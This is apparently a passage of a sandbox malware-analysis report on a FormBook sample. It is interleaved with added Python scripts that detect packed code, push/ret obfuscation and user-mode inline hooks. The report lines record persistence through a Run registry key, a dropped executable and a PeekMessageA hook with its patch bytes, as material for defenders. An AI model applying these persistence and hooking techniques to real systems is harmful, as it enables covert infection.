          Source: C:\Program Files (x86)\Iobk\vgaot707b.exe Code function: 18_2_0041C712 push eax; ret 18_2_0041C718
          Source: C:\Program Files (x86)\Iobk\vgaot707b.exe Code function: 18_2_0041C71B push eax; ret 18_2_0041C782
          Source: initial sample Static PE information: section name: .text entropy: 7.85104042962
          Source: initial sampleStatic PE information: section name: .text entropy: 7.85104042962
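The push/ret pairs and the .text entropy listed above are the two static obfuscation indicators the sandbox raises for this sample: a `push` immediately followed by `ret` (or `retf`/`iretd`) is an obfuscated indirect jump that breaks linear disassembly, and a code section whose entropy is close to 8 bits per byte is almost always packed or encrypted. The Python below is an added example, not code from Joe Sandbox or from the report: it reproduces both checks over a PE image with the standard library only, walking the section table, computing per-section Shannon entropy and scanning for the push/ret idioms. The PE it analyses is constructed inside the script (one .text section filled with test bytes) and is not the analysed binary; the 7.0 entropy threshold is a common rule of thumb, not a value from the sandbox.

```python
import math
import struct

# The report flags "push X; ret" (and retf/iretd) pairs: an obfuscated jump that
# confuses linear disassembly. These are the terminating opcodes the scanner accepts.
RET_OPCODES = {0xC3: "ret", 0xCB: "retf", 0xCF: "iretd"}


def shannon_entropy(data: bytes) -> float:
    """Entropy in bits per byte (0.0 .. 8.0); packed or encrypted code sits near 8."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def pe_sections(image: bytes):
    """Yield (name, virtual_address, raw_bytes) for each section, parsing only the
    DOS header, COFF header and section table. Raises ValueError on non-PE input."""
    if image[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    num_sections = struct.unpack_from("<H", image, e_lfanew + 6)[0]
    size_opt = struct.unpack_from("<H", image, e_lfanew + 20)[0]
    table = e_lfanew + 24 + size_opt
    for i in range(num_sections):
        off = table + 40 * i
        name = image[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        virt_addr, raw_size, raw_ptr = struct.unpack_from("<III", image, off + 12)
        yield name, virt_addr, image[raw_ptr:raw_ptr + raw_size]


def find_push_ret(data: bytes, base: int = 0):
    """Return (address, mnemonic) for every push/ret idiom found by a linear byte scan.
    Handles 'push r32' (0x50-0x57), 'push cs' (0x0E) and 'push imm32' (0x68)."""
    hits = []
    for i, op in enumerate(data):
        if (0x50 <= op <= 0x57 or op == 0x0E) and i + 1 < len(data) and data[i + 1] in RET_OPCODES:
            reg = "cs" if op == 0x0E else "r32"
            hits.append((base + i, f"push {reg}; {RET_OPCODES[data[i + 1]]}"))
        elif op == 0x68 and i + 5 < len(data) and data[i + 5] in RET_OPCODES:
            imm = struct.unpack_from("<I", data, i + 1)[0]
            hits.append((base + i, f"push {imm:#010x}; {RET_OPCODES[data[i + 5]]}"))
    return hits


def analyze(image: bytes, entropy_threshold: float = 7.0) -> dict:
    """Per-section verdict: entropy, packed flag, and push/ret candidates (as RVAs)."""
    report = {}
    for name, va, raw in pe_sections(image):
        ent = shannon_entropy(raw)
        report[name] = {
            "entropy": round(ent, 3),
            "likely_packed": ent >= entropy_threshold,
            "push_ret": find_push_ret(raw, base=va),
        }
    return report


def build_test_image(text: bytes) -> bytes:
    """Constructed minimal 32-bit PE with one .text section at RVA 0x1000.
    Test scaffolding only; it is not the analysed sample."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0, 0x102)  # i386, 1 section, no optional header
    raw_ptr = 0x200
    section = b".text".ljust(8, b"\0") + struct.pack("<IIII", len(text), 0x1000, len(text), raw_ptr) + b"\0" * 16
    headers = dos + b"PE\0\0" + coff + section
    return headers + b"\0" * (raw_ptr - len(headers)) + text


# Constructed section body: near-uniform bytes (high entropy) plus two of the idioms
# the report lists, "push eax; ret" and "push 813536D0h; iretd".
SAMPLE_TEXT = bytes(range(256)) * 4 + b"\x50\xC3" + b"\x68\xD0\x36\x35\x81\xCF"

if __name__ == "__main__":
    for name, info in analyze(build_test_image(SAMPLE_TEXT)).items():
        print(name, info["entropy"], "packed" if info["likely_packed"] else "plain")
        for addr, mnem in info["push_ret"]:
            print(f"  {addr:#010x}  {mnem}")
```

A linear byte scan overcounts compared with the report, which disassembles functions it has identified: any 0x50..0x57 byte that happens to precede 0xC3 inside data or in the middle of another instruction will match, so treat hits as candidates to confirm in a disassembler. To run it on a real file, call `analyze(open(path, "rb").read())`.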

          Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\Iobk\vgaot707b.exe

          Source: C:\Windows\SysWOW64\cscript.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run CX6HZ (reported twice)

          Hooking and other Techniques for Hiding and Protection:

          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x82 0x23 0x38
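The entry above records that, inside explorer.exe, the first bytes of user32!PeekMessageA no longer match the DLL on disk. That comparison is how the sandbox detects user-mode inline hooks, and hooking the message-loop APIs of the process it hides in is how FormBook intercepts input. The Python below is an added example, not code from the page or from Joe Sandbox. It shows the check a hook scanner performs: compare each export's prologue as read from the clean DLL with the bytes read from the live process, and for every mismatch decode where the patch transfers control and whether that target lies inside a loaded module. Collecting the two snapshots on Windows (mapping the DLL from disk, ReadProcessMemory on the target, the module list for the ranges) is outside the script; the snapshots, the load addresses, the 0x02D90000 target and the `mov edi,edi; push ebp; mov ebp,esp` clean prologue are constructed for the demonstration. The PeekMessageA entry uses the six bytes the report lists; they are not a recognised detour opcode sequence, so the scanner flags the change but resolves no target for it.

```python
import struct

# Constructed inputs (assumptions for the demonstration, not data from the report):
# a load address for user32.dll, two module ranges, and the common hot-patchable
# x86 prologue "mov edi,edi; push ebp; mov ebp,esp; sub esp,10h" as the clean bytes.
USER32_BASE = 0x76A00000
MODULES = [("user32.dll", USER32_BASE, 0x1A0000), ("kernel32.dll", 0x76000000, 0xF0000)]
CLEAN = bytes.fromhex("8b ff 55 8b ec 83 ec 10")

DISK = {
    "PeekMessageA":     (USER32_BASE + 0x1C2A0, CLEAN),
    "GetMessageA":      (USER32_BASE + 0x1D100, CLEAN),
    "TranslateMessage": (USER32_BASE + 0x1F000, CLEAN),
    "SendMessageA":     (USER32_BASE + 0x1E400, CLEAN),
}


def patched(name: str, head: bytes):
    """Live copy of an export with its first len(head) bytes overwritten."""
    va, clean = DISK[name]
    return va, head + clean[len(head):]


MEMORY = dict(DISK)  # SendMessageA stays untouched
MEMORY["PeekMessageA"] = patched("PeekMessageA", bytes.fromhex("48 8b b8 82 23 38"))              # bytes from the report
MEMORY["GetMessageA"] = patched("GetMessageA", b"\x68" + struct.pack("<I", 0x02D90000) + b"\xC3")  # push/ret into private memory
MEMORY["TranslateMessage"] = patched("TranslateMessage", b"\xE9" + struct.pack("<i", 0x30FFB))     # jmp rel32 staying inside user32


def decode_detour(func_va: int, new: bytes):
    """(label, target) for a patched prologue; target is None when the patch is
    not a recognised control transfer."""
    if len(new) >= 5 and new[0] == 0xE9:                     # jmp rel32: target = next_ip + rel
        rel = struct.unpack_from("<i", new, 1)[0]
        return "jmp rel32", (func_va + 5 + rel) & 0xFFFFFFFF
    if len(new) >= 6 and new[0] == 0x68 and new[5] == 0xC3:  # push imm32; ret
        return "push/ret", struct.unpack_from("<I", new, 1)[0]
    if len(new) >= 6 and new[:2] == b"\xFF\x25":             # jmp dword ptr [addr]: reports the pointer slot
        return "jmp indirect", struct.unpack_from("<I", new, 2)[0]
    if new and new[0] == 0xCC:
        return "int3", None
    return "unrecognised patch", None


def module_for(addr: int, modules):
    """Name of the loaded module whose range contains addr, or None if unbacked."""
    for name, base, size in modules:
        if base <= addr < base + size:
            return name
    return None


def scan_hooks(disk: dict, memory: dict, modules) -> list:
    """Compare each export's prologue from the clean image with the live process
    copy and describe every mismatch. disk/memory map name -> (va, bytes)."""
    findings = []
    for name, (va, clean) in disk.items():
        live = memory.get(name, (None, None))[1]
        if live is None or live == clean:
            continue
        label, target = decode_detour(va, live)
        backing = module_for(target, modules) if target is not None else None
        findings.append({
            "function": name,
            "patch": label,
            "target": target,
            "target_module": backing,
            "unbacked_target": target is not None and backing is None,
            "new_code": live.hex(" "),
        })
    return findings


if __name__ == "__main__":
    for f in scan_hooks(DISK, MEMORY, MODULES):
        tgt = f"{f['target']:#010x} ({f['target_module'] or 'unbacked'})" if f["target"] is not None else "n/a"
        print(f"{f['function']:<18} {f['patch']:<18} target={tgt}  new code: {f['new_code']}")
```

A target in unbacked (private) memory is the strong signal: nothing legitimate redirects user32 exports into anonymous memory, which is exactly where an injector's payload lives. A target inside a loaded module still deserves a look (hot-patching and some security products also rewrite prologues in place) but is a weaker finding on its own. Compare full prologues rather than the first byte only; a hook that leaves `mov edi,edi` intact and overwrites the bytes after it would otherwise be missed.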
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exe Process information set: NOOPENFILEERRORBOX (35 identical entries)
          Source: C:\Windows\SysWOW64\cscript.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX (5 identical entries)
          Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX (3 identical entries)